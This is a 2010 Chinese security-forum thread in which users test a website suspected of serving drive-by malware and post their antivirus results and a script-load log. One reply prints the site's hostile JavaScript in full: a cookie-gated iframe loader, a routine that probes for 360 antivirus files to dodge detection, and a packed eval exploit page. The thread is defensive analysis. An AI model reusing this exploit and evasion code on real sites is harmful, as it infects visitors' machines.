很厉害的毒网，请鉴定[挂马][已检测 by 是昔流芳]

显示全部楼层 · 发表于 2010-7-27 18:06:01

本帖最后由是昔流芳于 2010.7.27 18:09 编辑

hxxp://www.a67.cn/g/
枫树，ess 拦截

nis，微点驻防，无反应
希望能有点人气，呵呵

显示全部楼层 · 发表于 2010-7-27 19:19:20

本帖最后由 langzi2009 于 2010.7.28 16:20 编辑

显示全部楼层 · 发表于 2010-7-27 19:33:40

用FF3.6进，卡巴、毒霸、网盾全部没做声

显示全部楼层 · 发表于 2010-7-27 19:58:55

好像没问题呀

Log generated by yishuad use mdecoder 0.63
[root]http://www.a67.cn/g/(武汉光辉广告制作部)
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
[iframe]http://ad6.alimama.vu.cx:171/360/index.html?id=124
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
[script]http://www.a67.cn/g/menu/menu_func.js
[script]http://www.a67.cn/g/menu/menu_init.js
[script]http://www.a67.cn/g/css/membed.js
[iframe]http://www.a67.cn/*.htm
[script]http://www.a67.cn/g/gb2big5.js
[script]http://www.a67.cn/g/menu/menu_content.js
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as
[script]http://31l.office.1s.fr/office.js?google_ad_format=728x90_as

显示全部楼层 · 发表于 2010-7-27 22:01:12

本帖最后由救命稻草于 2010.7.27 22:09 编辑

回复 2楼 langzi2009 的帖子

先是恶意网址拦截

点继续访问后其它模块没报，但监控报了

显示全部楼层 · 发表于 2010-7-27 22:27:59

费尔KILL，网盾报安全

显示全部楼层 · 发表于 2010-7-27 22:52:56

<html>
<head>
<script>
var self_url = document.location.href.toLowerCase();
var strid = new Array();
strid = self_url.split("?id="); //如果URL地址中?id=10，所以这里的值你要用10来分析
var id = strid[1];
if(id == null)
id = 0;
var IsSucc;
document.writeln("<script src=\'chk.php?id=" + id + "\'><\/script>");
//document.writeln("<script src=\'safe.js\'><\/script>");
</script>
</head>
<body>
<script>
window.onerror=function(){return true;}
document.writeln("<iframe id='myboom' src='about:blank' width=100 height=110><\/iframe>");
if(document.cookie.indexOf("IsGone=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="IsGone=Yes;path=/;expires="+expires.toGMTString();
boom();
var tj_num = "";
//IsSucc = false;//no ip
if(IsSucc == true)
{
if(id >= 100 && id <=102)
tj_num = "1811943";
else
if(id >= 106 && id <=199)
tj_num = "1811943";
else
if(id >= 1000 && id <=1010)
tj_num = "1720187";
else
if(id == 104)
tj_num = "1816435";
else
if(id == 105)
tj_num = "1816440";
//下面是特殊的
if(id == 7002)
tj_num = "1770963";
}
document.writeln("<script type="text/javascript" src="http://js.tongji.linezing.com/1720199/tongji.js"><\/script>");
if(IsSucc == true)
{
document.writeln("<script type="text/javascript" src="http://js.tongji.linezing.com/"+tj_num+"/tongji.js"><\/script>");
if(id == 103)
{
document.writeln("<script src='http://s15.cnzz.com/stat.php?id=2325691&web_id=2325691' language='JavaScript'><\/script>");
}
document.writeln(IsSucc);
}
}
function boom()
{
var url = "boom-2.html?id=" + id;
var ifra = document.getElementById("myboom");
ifra.src = url;
}
</script>
</body>
</html>

复制代码

以上是检测代码
以下是静态对抗杀软代码,如果检测到360就不加载恶意代码,如果没有检测到就继续

var bSafe = true;
function openWin() {
knownImg = {}
knownImg.resList = [
{id: 'c1safe', res: 'res://c:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
{id: 'd1safe', res: 'res://d:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
{id: 'e1safe', res: 'res://e:\\Program%20Files\\360\\360Safe\\repairleakdll.dll/GIF/154'},
{id: 'c2afe', res: 'res://c:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
{id: 'd2safe', res: 'res://d:\\Program%20Files\\360Safe\\live.dll/#2/#203'},
{id: 'e2afe', res: 'res://e:\\Program%20Files\\360Safe\\live.dll/#2/#203'}
];
knownImg.ok_resList = new Array();
knownImg.tmp_resList = new Array();
knownImg.checkSoft = function(){
if (document.all){
x = new Array();
for (i = 0; i < knownImg.resList.length; i++){
x[i] = new Image();
x[i].src = "";
knownImg.ok_resList.push(knownImg.resList[i].id);
x[i].onload = function(){
//alert(knownImg.resList[i].id + ': return true');
}
x[i].onerror = function(){
//alert(knownImg.resList[i].id + ': return false');
knownImg.ok_resList.pop();
}
x[i].src = knownImg.resList[i].res;
}
}
}
knownImg.checkSoft();
if(knownImg.ok_resList.length>0)
{
//alert(knownImg.ok_resList);
//document.write('finded：<br />'+knownImg.ok_resList.join('<br />'));
bSafe = false;
}else{
//alert('no');
bSafe = true;
}
}
openWin();

复制代码

总的代码里包含了Cookie,24小时内只加载一次代码,静态对抗杀软方法,至于网马的位置,关键的的地方是

var url = "boom-2.html?id=" + id;
var ifra = document.getElementById("myboom");
ifra.src = url;

复制代码

这里包含了一个id,id是一个变量,尝试下从代码里找

if(id >= 100 && id <=102)

复制代码

如果id大于等于100,小于等于102
我们假设id=100得到url

hxxp://ad7.alimama.vu.cx:171/win7/boom-2.html??id=100

复制代码

得到代码

<HTML>
<BODY><BUTTON id=aaa style='DISPLAY: none' onclick=a1();></BUTTON>
<script language="JavaScript">
var self_url = document.location.href.toLowerCase();
var strid = new Array();
strid = self_url.split("?id=");
var id = strid[1];
document.writeln("<script src=\'"+id+"/a.jpg\'><\/script>");
</script>
<script src='pps.js'></script>
<SCRIPT language=javascript>
var a4 = YTshell;
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 a(){8();7 0=4.5(\'6\');0.b(\'#c#i\');4.f(0);d{0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1);0.2(\'3\',1)}h(e){}1.g+=\'\'}',19,19,'a7|window|setAttribute|s|document|createElement|body|var|ac2|function|a1|addBehavior|default|try||appendChild|status|catch|userData'.split('|'),0,{}))
document.getElementById('aaa').onclick();
</SCRIPT>
</BODY></HTML>

复制代码

document.writeln("<script src=\'"+id+"/a.jpg\'><\/script>"); //这里a.jpg就应该是100a.jpg因为上面的id=100

复制代码

以上是个人看法,如果有说错的地方,还望大牛指正!

显示全部楼层 · 发表于 2010-7-28 00:25:17

显示全部楼层 · 发表于 2010-7-28 00:31:30

显示全部楼层 · 发表于 2010-7-28 09:24:32

回复 7楼 e54hacker 的帖子

很久没有看到这么详细的分析了。

膜拜大牛

[其它] 很厉害的毒网，请鉴定[挂马][已检测 by 是昔流芳]

评分